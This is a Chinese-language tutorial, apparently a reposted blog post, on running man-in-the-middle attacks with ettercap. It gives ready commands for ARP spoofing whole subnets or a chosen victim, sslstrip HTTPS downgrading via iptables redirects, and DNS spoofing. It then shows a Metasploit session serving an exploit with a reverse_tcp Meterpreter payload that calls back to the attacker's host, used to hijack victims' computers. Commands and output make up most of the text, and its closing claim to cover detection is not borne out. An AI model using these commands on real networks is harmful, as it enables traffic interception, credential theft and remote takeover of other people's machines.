ettercap


原文链接: ettercap

Ettercap是一个多用途的开源工具,可以用来执行嗅探、主机分析等。在本教程中,我们使用中间人攻击进行ARP欺骗,ettercap有些不错的插件,可以增强中间人攻击。Ettercap中最重要的插件如下:
dns_spoof (执行DNS欺骗攻击)
Dos_attack(对受害主机进行拒绝服务攻击)
Chk_poison(检测是否成功进行了攻击)
Repoison_arp(顾名思义,修复ARP)

Ettercap SEND L3 错误 ?

SEND L3 ERROR: 1298 byte packet (0800:06) destined to xxx.xxx.xx.xxx was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
这个错误的原因其实是因为没有打开系统的ip转发功能,解决办法很简单

echo "1" > /proc/sys/net/ipv4/ip_forward

#重装了Ubuntu 12.04,内核升级后,支持了临时IPV6地址,但是,默认被设置成了:优先走临时地址,再走public地址。

关键就是这个use_tempaddr啦,定义如下:
use_tempaddr System dependent (seems to be 2 on Ubuntu these days…) We might expect that this is a simple on/off value to enable use of temporary addresses. Yet when we cat it on this system it has the value ’2′.

0:不使用临时IPV6地址
<=0 Disable Privacy Extensions (i.e. do not use changing temporary addresses at all)
==1 Use the Privacy Extensions, but prefer public (i.e. non-temporary) adresses over temporary ones.
>1 (e.g. 2 as here) Use the Privacy Extensions and prefer them.

该怎么做不用我说了吧,root直接写值即可。
su
echo 0 > /proc/sys/net/ipv6/conf/eth0/use_tempaddr

备注:此内核设置即时生效,无需重启networking服务。
################################################################################

-t 只监听这种协议
-T ettercap检查pcap文件(脱机监听)
-q 安静(不回显)
-M 这是一个重要的参数,他会告诉ettercap执行中间人攻击,使用这个参数很简单,如 -M method
-F 指定要加载的过滤规则
-P 加载插件

sudo ettercap -i enp3s0 -T -q /// ///

#ARP欺骗
################################################################################
##对所有主机进行ARP欺骗
Ettercap -T -q -M ARP//
sudo ettercap -i enp3s0 -T -q -M arp:remote /// ///
##目标/受害者 IP:192.168.1.6 欺骗
sudo ettercap -T -q -M ARP /192.168.1.6/ //

嗅探字段

vi /etc/ettercap/etter.conf

################################################################################

etterfilter 过滤规则

ls /usr/share/ettercap
etterfilter /usr/share/ettercap/etter.filter.ssh -o ssh.ef
sudo ettercap -T -q -i enp3s0 -F exe.ef -M ARP // // -P autoadd

/usr/share/ettercap/
/usr/share/ettercap/etter.fields
指定要提取的字段
[loginauth]
Loginauth

sslstrip

sudo vi /etc/ettercap/etter.conf

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 992 -j REDIRECT --to-ports 59263
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 465 -j REDIRECT --to-ports 59264
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 995 -j REDIRECT --to-ports 59265
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 563 -j REDIRECT --to-ports 59266
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 636 -j REDIRECT --to-ports 59267
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 994 -j REDIRECT --to-ports 59268
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 993 -j REDIRECT --to-ports 59269
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 8080 -j REDIRECT --to-ports 59271
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 59272
-A PREROUTING -i enp3s0 -p tcp -m tcp --dport 990 -j REDIRECT --to-ports 59274

sudo ettercap -T -q -i enp3s0 -F exe.ef -M ARP // // -P sslstrip
#DNS欺骗
################################################################################
选择etter。查看Dns使用简单的命令:
root@bt:~# locate etter.dns
/usr/local/share/videojak/etter.dns
/usr/share/ettercap/etter.dns
root@bt:~#
现在你可以使用你喜欢的文本编辑器来编辑这个文件。你可以使用文本编辑器nano或者其他任何你想要的
root@bt:~# gedit /usr/share/ettercap/etter.dns
root@bt:~# nano /usr/share/ettercap/etter.dns
当你完成了保存这个文件,现在做好了准备。我们需要做得就是通过ettercap启用DNS欺骗攻击:
root@bt:~# ettercap -T -q -P dns_spoof -M arp // //

让我们来拆开命令结构,来分析DNS欺骗攻击所用到的命令:
-P 使用插件,这里我们使用的是dns_spoof
-T 使用基于文本界面
-q 启动安静模式(不回显的意思)
-M 启动ARP欺骗攻击
// // 代表欺骗整个子网网络
此外,我们可以综合使用这些命令。例如,你想要欺骗一个特定的受害主机,那么你可以使用受害者的IP来执行DNS欺骗攻击。

root@bt:~# ettercap -T -q -P dns_spoof -M arp // //
在另一个例子中,你可以使用特定的接口来执行dns欺骗攻击。为此,可以使用如下命令:

root@bt:~# ettercap -T -q -i eth0 -P dns_spoof -M arp // //
DNS欺骗是一种非常危险的攻击,因为攻击者可以利用ettercap的dns_spoof插件和其他工具执行攻击。最终,攻击者可以使用一个社会工程工具包(作者这里指的应该是SET了)来执行攻击去控制受害者的电脑。想象一下这是多少容易,通过社会工程工具包和DNS欺骗技术你所需要做得就是配置你的社会工程工具包和你的IP清单,制作像谷歌一样的网站欺骗域名到你的IP地址上。当受害者打开google,你的攻击将使它访问你的IP,之后建立一个远程的会话。
让我们来考虑一个示例场景:下面是是metasploit 渗透工具使用ettercap进行dns欺骗。选择你想要的exploit,在payload中我们就选择 reverse_tcp:
root@bt:~# msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 Yooo' 8YooP8 YooP' 8YooP' 8YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.7.0-release [core:3.7 api:1.0]

  • -- --=[ 684 exploits - 355 auxiliary
  • -- --=[ 217 payloads - 27 encoders - 8 nops

msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.12
SRVHOST => 192.168.1.12
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[] Exploit running as background job.
[
] Started reverse handler on 192.168.1.12:4444
[]
[
] Send vulnerable clients to \www.2cto.com \bqokoWwx.
[] Or, get clients to save and render the icon of http:///.lnk
[]
[
] Using URL: http://192.168.1.12:80/
[
] Server started.
如果一切正常,我们所需要做得就是根据我们的DNS配置etter文件。看下面这个图:我使用攻击者的IP地址来设置为目标网站。一旦受害者打开该网站,他将被重定向到192.168.1.12中,然后会话开始。

这些只是DNS欺骗中最危险的一个方面:受害者不知道发送了什么,因为一切似乎是合情合理的,但不幸的是数据并没有进行正确的传输。此外,这种攻击非常危险,因为攻击者可能会利用这个技术在公共的wi-fi点上,入侵其他电脑。希望这篇文章已经讨论了一个有用的策略来检测ARP欺骗攻击和DNS欺骗攻击。

`